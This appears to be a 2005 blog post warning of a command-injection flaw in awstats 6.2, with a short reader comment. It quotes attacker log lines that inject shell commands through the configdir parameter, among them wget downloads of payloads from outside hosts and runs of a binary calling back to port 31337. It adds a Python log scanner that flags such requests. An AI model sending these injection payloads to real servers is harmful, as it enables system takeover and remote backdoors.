2005-02-24

Security issues in awstats

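awstats 6.2 has a security vulnerability: when a user places malicious code in the URL, they can obtain a lot of system information, or even break into the system.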


Here is part of the log file:

65.2.52.146 - - [19/Feb/2005:02:07:53 +0100] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.11.149.95 - - [19/Feb/2005:04:26:55 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.11.149.95 - - [19/Feb/2005:04:26:57 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.11.149.95 - - [19/Feb/2005:04:33:14 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20uname%20-a;%20id;%20pwd;%20wget%20;echo%20__fim__;echo%20| HTTP/1.1" 403 264 "-" "-"
65.2.50.231 - - [19/Feb/2005:10:38:12 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.2.50.231 - - [19/Feb/2005:10:38:11 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
68.21.2.4 - - [19/Feb/2005:21:04:44 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20uname%20-a;%20id;%20pwd;%20uptime;%20df%20-h%20;echo%20__fim__;echo%20| HTTP/1.1" 403 277 "-" "-"
200.138.23.115 - - [20/Feb/2005:06:23:24 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;uname%20-a;id;pwd;echo%20__fim__;echo%20| HTTP/1.1" 403 243 "-" "-"
200.138.23.115 - - [20/Feb/2005:06:23:29 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:23:41 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;uname%20-a;echo%20;echo| HTTP/1.1" 200 566 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:23:53 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;ls;echo%20;echo| HTTP/1.1" 200 35973 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:23:59 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;pwd;echo%20;echo| HTTP/1.1" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:24:07 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.mobettah.com.br/dc;echo%20;echo| HTTP/1.1" 200 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:24:24 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;chmod%20777%20dc;./dc%20200.138.23.115%2031337;echo%20;echo| HTTP/1.1" 200 665 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:24:27 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;chmod%20777%20dc;./dc%20200.138.23.115%2031337;echo%20;echo| HTTP/1.1" 200 654 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.151.248.112 - - [20/Feb/2005:06:41:15 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;uname%20-a;id;uptime;pwd;echo%20;echo%20| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; DigExt)"
69.34.141.197 - - [21/Feb/2005:01:04:26 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp;%20wget%20atomix.0catch.com/rpcd;%20chmod%20777%20/tmp/rpcd;%20/tmp/rpcd%20;echo%20__fim__;echo%20| HTTP/1.1" 403 315 "-" "-"
69.34.141.197 - - [21/Feb/2005:01:04:38 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20ls%20;echo%20__fim__;echo%20| HTTP/1.1" 403 235 "-" "-"
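
The requests above share one pattern: a `configdir` parameter on `awstats.pl` whose value contains shell metacharacters. The following is an added example, not part of the original post: a small Python scanner that flags such requests in an access log and separates the ones answered with a 2xx status from the rejected ones. The sample lines, the function name `scan` and the metacharacter set are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Characters that never belong in a directory path passed as configdir.
SHELL_META = re.compile(r"[|;`$&<>\n]")

# Constructed sample lines (documentation addresses), modelled on the log above.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2005:02:07:53 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;id;echo| HTTP/1.0" 404 216 "-" "-"',
    '192.0.2.11 - - [19/Feb/2005:04:26:55 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;id;echo| HTTP/1.0" 200 546 "-" "-"',
    '192.0.2.12 - - [19/Feb/2005:05:00:00 +0100] "GET /awstats/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 9120 "-" "-"',
    '192.0.2.13 - - [19/Feb/2005:05:01:00 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

def scan(lines):
    """Return one finding per awstats.pl request whose configdir value
    contains shell metacharacters."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        path, _, query = m.group("target").partition("?")
        if not path.lower().endswith("awstats.pl"):
            continue
        for param in query.split("&"):
            name, _, raw = param.partition("=")
            value = unquote(raw)  # decode %20 and friends before matching
            if unquote(name).lower() == "configdir" and SHELL_META.search(value):
                status = int(m.group("status"))
                findings.append({
                    "ip": m.group("ip"), "time": m.group("ts"),
                    "status": status, "configdir": value,
                    # Assumption: a 2xx status means the CGI handled the
                    # request, so these hosts need follow-up first.
                    "reached_script": 200 <= status < 300,
                })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "CHECK HOST" if f["reached_script"] else "rejected"
        print(f'{f["time"]} {f["ip"]} {f["status"]} {flag}: {f["configdir"]!r}')
```

Entries marked `reached_script` correspond to the 200 responses in the log above; the 403 and 404 entries were refused by the server.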


1 comment:

  1. I found this too, and my machine was hacked as well. Scary. I don't know whether the latest version has fixed this problem.